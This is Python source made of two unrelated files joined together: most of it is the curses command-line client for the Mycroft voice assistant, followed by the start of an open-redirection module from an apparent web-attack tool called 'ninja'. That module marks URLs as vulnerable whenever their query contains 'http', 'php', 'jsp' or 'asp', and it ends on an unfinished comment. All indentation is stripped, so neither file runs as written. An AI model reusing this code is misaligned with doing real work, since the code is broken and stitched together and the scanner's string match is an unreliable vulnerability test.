return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
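# For reference, save_settings() above writes a flat JSON file; an illustrative
# ~/.mycroft_cli.conf using the module defaults would look like:
#
#   {"filters": ["mouth.viseme", "mouth.display", "mouth.icon"],
#    "cy_chat_area": 7, "show_last_key": false,
#    "max_log_lines": 5000, "show_meter": true}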
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Arguments:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS-x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad-x-len(msg))
else:
# pad to given length (or screen width)
if x+pad > curses.COLS:
pad = curses.COLS-x
s += ch * (pad-len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
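# Example calls (illustrative): draw(0, 5, "Status:", pad=True) pads with
# spaces to the right edge of the screen, while draw(0, 6, "ok", pad=10,
# pad_chr="-") pads the text out to 10 columns with dashes.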
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
        # Colors (on black background):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(x, y, " "+make_titlebar("= GUI", gui_width-1)+" ", clr=CLR_HEADING)
cnt = len(gui_text)+1
if cnt > curses.LINES-15:
cnt = curses.LINES-15
for i in range(0, cnt):
draw(x, y+1+i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x+2, y+1+i, gui_text[i], pad=gui_width-3)
else:
draw(x+2, y+1+i, "*"*(gui_width-3))
draw(x+(gui_width-1), y+1+i, "!", clr=CLR_HEADING)
draw(x, y+cnt, " "+"-"*(gui_width-2)+" ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_full_redraw
global auto_scroll
global size_log_area
if time.time() - last_full_redraw > FULL_REDRAW_FREQUENCY:
            # Do a full-screen redraw periodically to clear any
            # noise from non-curses text that gets output to the
            # screen (e.g. modules that do a 'print')
scr.clear()
last_full_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS-1-len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS-1-len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG1)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG2)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS-20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: "+last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [
(
'Log Scrolling shortcuts',
[
("Up / Down / PgUp / PgDn", "scroll thru history"),
("Ctrl+T / Ctrl+PgUp", "scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn", "scroll to bottom of logs" +
"(jump to newest)"),
("Left / Right", "scroll long lines left/right"),
("Home / End", "scroll to start/end of long lines")
]
),
(
"Query History shortcuts",
[
("Ctrl+N / Ctrl+Right", "previous query"),
("Ctrl+P / Ctrl+Left", "next query")
]
),
(
"General Commands (type ':' to enter command mode)",
[
(":quit or :exit", "exit the program"),
(":meter (show|hide)", "display the microphone level"),
(":keycode (show|hide)", "display typed key codes (mainly debugging)"),
(":history (# lines)", "set size of visible history buffer"),
(":clear", "flush the logs")
]
),
(
"Log Manipulation Commands",
[
(":filter 'STR'", "adds a log filter (optional quotes)"),
(":filter remove 'STR'", "removes a log filter"),
(":filter (clear|reset)", "reset filters"),
(":filter (show|list)", "display current filters"),
(":find 'STR'", "show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)", "set logging level"),
(":log bus (on|off)", "control logging of messagebus messages")
]
),
(
"Skill Debugging Commands",
[
(":skills", "list installed skills"),
(":activate SKILL", "activate skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL", "deactivate skill"),
(":keep SKILL", "deactivate all skills except " +
"the indicated skill")
]
)
]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " "+w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""
        Show list of loaded skills in as many columns as necessary
"""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
scr.get_wch() # blocks
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI loop
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
        # List loaded skills
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time()-start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time()-start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
if code < 33:
last_key = str(code)
else:
last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')}))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
    except Exception as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
open_redirection.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import ninja
import argparse
import timeit
import multiprocessing as mp
from urlparse import urlparse
import sys
# save_data is defined per attack module, since each one uses a different
# pattern to judge the result of the attack
class open_redirection(ninja.web):
def __init__(self, collection_saving_urls):
# connect the collection
self.collection_saving_urls = self.db[collection_saving_urls]
def save_data(self, urls):
self.collection_saving_results = self.db["report"]
for url in urls:
if urlparse(url)[4].find("http") != -1 or\
urlparse(url)[4].find("jsp") != -1 or\
urlparse(url)[4].find("php") != -1 or\
urlparse(url)[4].find("asp") != -1:
print url
self.collection_saving_results.insert({"url" : url,
"open redirection" : True
})
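# Illustrative example of a URL that save_data() above would flag (the query
# string of the parsed URL contains an absolute "http" target, one of the
# patterns checked for; host names here are hypothetical):
#
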